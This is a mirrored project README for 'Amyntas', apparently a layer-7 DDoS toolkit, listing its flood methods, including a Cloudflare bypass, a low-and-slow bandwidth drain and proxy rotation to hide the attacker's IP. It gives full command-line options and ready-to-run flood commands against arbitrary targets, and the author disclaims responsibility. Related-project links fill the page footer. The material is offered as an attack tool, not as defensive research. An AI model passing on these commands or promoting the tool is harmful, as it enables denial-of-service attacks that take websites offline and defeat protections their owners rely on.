Giter VIP home page Giter VIP logo

amyntas's Introduction

READ THIS FIRST

I've started working on a new tool, called Cerberus, its better than Amyntas and will have more frequent updates
This tool will remain public, but i will NOT release any more updates

NOTE!

Results may vary A LOT when attacking!
It might peak at 40k rq/s and drop down to 2k rq/s or peak at 169 requests per second, just so you know!
Also, for the BYPASS attack to work on *nix you need to replace the .exe executable with the ELF binary.


About

Amyntas is a layer 7 DoS/DDoS toolkit, with a variety of attack methods and the capability to bypass caching systems.
Use at your own risk! I, the author, am not responsible for any harm you do! Keep that in mind!


Aviable methods

  • GET (simple GET flood)
  • HEAD (simple HEAD flood)
  • POST (simple POST flood)
  • FAST (a GET / flood)
  • GHP/GETHEADPOST (a flood which randomly chooses GET, HEAD or POST as request method)
  • LEECH (a low & slow HTTP GET flood which can drain A LOT of bandwith)
  • MIX (a method which randomly chooses HTTP request methods)
  • BYPASS (method which uses browser emulation to get a cookie which will be used to bypass services like Cloudflare)
  • PROXY (GET flood which hides its IP using a specified proxy list)

Features

  1. Proxy scraper & checker
  2. Cache bypassing mechanisms
  3. Random headers (user agents, referers)
  4. Real time "worker" system
  5. Supports custom user-agent and referer
  6. Proxy support (Rotating proxy aswell --rotate-proxy <file with proxies>)

Known bugs/problems

  1. None ATM :3

To Do list

  1. More methods
  2. More documentation
  3. Better exception handling
  4. Maybe colors? lol
  5. Better debugging (it's shit atm)

Usage

All options:

-h, --help                             Show this help message and exit
-t TARGET, --target TARGET             Target URL (Example: https://google.com or http://yandex.ru)
-p PORT, --port PORT                   Target port (Leave empty to let the tool decide)
-d DURATION, --duration DURATION       Attack duration
--proxy-file FILE_PATH                 Path to proxies
--proxy PROXY                          Use a proxy when attacking (Example: 127.0.0.1:1337)
--proxy-type PROXY_TYPE                Set the proxy type (HTTP, SOCKS4 or SOCKS5)
--proxy-user PROXY_USER                Proxy username
--proxy-pass PROXY_PASS                Proxy password
--proxy-resolve                        Resolve host using proxy (needed for hidden service targets)
-rt, --rotate-proxies                  Wether we should rotate proxies (use with `--proxy-file`)
-ua USERAGENT, --user-agent USERAGENT  User agent to use when attacking, else its randomly chosen
-ref REFERER, --referer REFERER        Referer to use when attacking, else its randomly chosen
-w WORKERS, --workers WORKERS          Amount of workers/threads to use when attacking
-dbg, --debug                          Print info useful for debugging
-bc, --bypass-cache                    Try to bypass any caching systems to ensure we hit the main site
-m METHOD, --method METHOD             Method to use when attacking (default: GET)
-dfw, --detect-firewall                Detect if the target site is protected by a firewall
--http-version HTTP_VERSION            Set the HTTP protocol version (default: 1.1)
--scrape-proxies                       Wether to scrape a list of proxies first (set the type using `--proxy-type`)
--check-proxies FILE_LOCATION          Specify a file with proxies to check (set type using `--proxy-type`)

Basic usage:

python3 amyntas.py -t https://target.com

GET flood, attacking with 100 threads for 1337 seconds:

python3 amyntas.py -t https://target.com -w 700 -d 1337

POST flood, attacking with 700 threads for 40 seconds:

python3 amyntas.py -t https://target.com -w 700 -m POST -d 40

Proxified PROXY/GET flood using a file with SOCKS5 proxies, with 1337 threads for 40 seconds:

python3 amyntas.py --proxy-file socks5.txt --proxy-type SOCKS5 -t https://target.com -w 1337 -d 40 -m PROXY

Raw GET flood, using HTTP protocol version 430 with 999 threads for 999 seconds:

python3 amyntas.py --http-version 430 -m GET -w 999 -d 999 -t https://target.com:420

GET flood that bypasses Cloudflare's UAM mode:

python3 amyntas.py -t https://target.com -w 200 -d 100 -m BYPASS --proxy-file socks5.txt

Requirements

requests
argparse
colorama
netaddr
cloudscraper
selenium
undetected_chromedriver
ssl

Images

3.8k GET flood using 2300 threads

image

amyntas's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.